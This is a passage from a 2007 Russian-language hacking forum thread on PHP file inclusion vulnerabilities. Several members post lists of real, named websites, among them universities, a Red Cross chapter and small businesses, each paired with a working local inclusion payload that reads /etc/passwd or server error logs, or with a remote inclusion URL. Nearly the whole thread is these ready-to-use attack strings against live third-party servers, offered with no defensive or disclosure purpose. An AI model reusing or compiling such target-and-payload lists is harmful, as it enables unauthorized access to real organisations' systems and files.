ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #41  
Старый 23.04.2007, 17:58
Аватар для InferNo23
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

Цитата:
Сообщение от NOmeR1  
Удалённый инклуд (вроди бы )
в сорце:
Код:
<frame src="тут адрес" name="mainFrame">
просто вставка фрейма с твоим адресом, не иньекция


Код:
http://pythonlib.pergamen.hu/examples/index.php?p=../../../../../../etc/passwd
 
Ответить с цитированием

  #42  
Старый 24.04.2007, 13:55
Аватар для NOmeR1
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Локальные инклуды
Цитата:
http://www.ies.krakow.pl/fei/index.php?link=../../../../../../etc/passwd
http://www.zebis.ch/zebis5_kantone/schwyz/ictschwyz/drucken.php?link=../../../../../../etc/passwd
http://www.kusat.com/print.php?path=../../../../../../etc/passwd

Последний раз редактировалось NOmeR1; 24.04.2007 в 14:12..
 
Ответить с цитированием

  #43  
Старый 24.04.2007, 17:06
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

Код:
http://oechorus.org/index.php3?incl=/etc/passwd
Код:
http://www.teckel-rueden.de/main.php3?main=/etc/passwd
 
Ответить с цитированием

  #44  
Старый 24.04.2007, 18:05
Аватар для NOmeR1
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Немного не PHP Injection, но бага
Цитата:
http://bbc.nvg.org/dir.php3?dir=../../../../../../etc/
Локальные инклуды (Здесь мноооого чего):
Цитата:
http://www.mega-jobs.de/1k_links.php3?include=../../../../../../etc/passwd
http://www.planetdave.com/layout.php3?include=../../../../../../etc/passwd
http://nerdbynature.de/bits/phpcksec/phpcksec.php?path=../../../../../../etc/passwd
http://elib.batol.net/incpag.php?incpag=bbsanc.php3&path=../../../../../../etc/passwd
http://www.wdkx.com/index.php3?path=../../../../../../etc/passwd
http://www.c2p2online.com/main.php3?inc=../../../../../../etc/passwd
http://www.redcrossnca.org/Online/view.php3?file=../../../../../../etc/passwd
http://www.posaunenwerk-ekhn.de/include/diashow.php3?file=../../../../../../etc/passwd
Для тех, кто знает китайский, удалённый инклуд:
Цитата:
http://elib.batol.net/incpag.php?incpag=[url]

Последний раз редактировалось NOmeR1; 24.04.2007 в 18:59..
 
Ответить с цитированием

  #45  
Старый 24.04.2007, 22:27
Аватар для NOmeR1
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Локальные:
Цитата:
http://mg25.com/index.php?HT=../../../../../../etc/passwd
http://www.diabetes-india.com/template.php?incfile=../../../../../../etc/passwd
http://www.karendecoster.com/archive.php?incfile=../../../../../../etc/passwd
http://www.hcc.vic.edu.au/templates/content.php?incfile=/../../../../../../etc/passwd&menu=menu0
http://www.ennear.co.kr/main/normal_form.php?infile=../../../../../../etc/passwd&m_mode=2
http://belrad.paris-minsk.org/index.php?language=0&current_frame=../../../../../../etc/passwd&current_menu=1
http://www.tinguj.net/?p=../../../../../../etc/passwd&fl=1
http://www.ex-light.ru/pages/menu.php?id=../../../../../../etc/passwd
http://www.anciamanovella.com/page.php3?url=../../../../../../etc/passwd
http://www.seeyou.co.jp/pets/subpage.php?incfile=../../../../../../etc/passwd
http://www.autohausbuchmann.de/popups/printMaincontent.php?incfile=../../../../../../etc/passwd
http://www.househype.net/index.php?ht=../../../../../../etc/passwd
Удалённые:
Цитата:
http://www.thaiaudiophile.com/auction.php?incfile=[url]
http://www.heller-kg.de/ref.php?ifile=[url]
http://belrad.paris-minsk.org/index.php?language=0&current_frame=[url]&current_menu=1
http://212.41.0.34/index.php?fl=[url]&part=main
http://www.ex-light.ru/pages/menu.php?id=[url]
http://www.anciamanovella.com/page.php3?url=[url]
http://www.househype.net/index.php?ht=[url]

Последний раз редактировалось NOmeR1; 24.04.2007 в 23:05..
 
Ответить с цитированием

  #46  
Старый 24.04.2007, 23:06
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Было бы иентереснее если при вы давали в инклуде логи как
error_log
access_log
ftp_log
etc....

Следсвенно буду ставить полююсы.
Показывайте что вы не просто банально можете подставить
Цитата:
../../../../../../etc/passwd
Ну а еще понимаете данный вид атаки до конца.
 
Ответить с цитированием

  #47  
Старый 24.04.2007, 23:35
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

2 [ cash ] - ok
поехали:
Код:
http://www.earthburg.ru/earthadm/php/process.php?lang=r&c1=10&id=1&file=../../../error_log
 
Ответить с цитированием

  #48  
Старый 25.04.2007, 00:31
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://foulard.ece.cornell.edu/index.php?loc=../../../../../etc/passwd
=\
 
Ответить с цитированием

  #49  
Старый 25.04.2007, 04:18
Аватар для VampiRUS
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

Код:
http://www.sembiz.com/index.php?addr=[url]
 
Ответить с цитированием

  #50  
Старый 25.04.2007, 16:49
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://www2.isye.gatech.edu/~jjb/wh/download.php?Down=../../../../../etc/passwd
сохраняем и открываем
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Books PSalm69 Избранное 248 27.10.2009 04:52
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ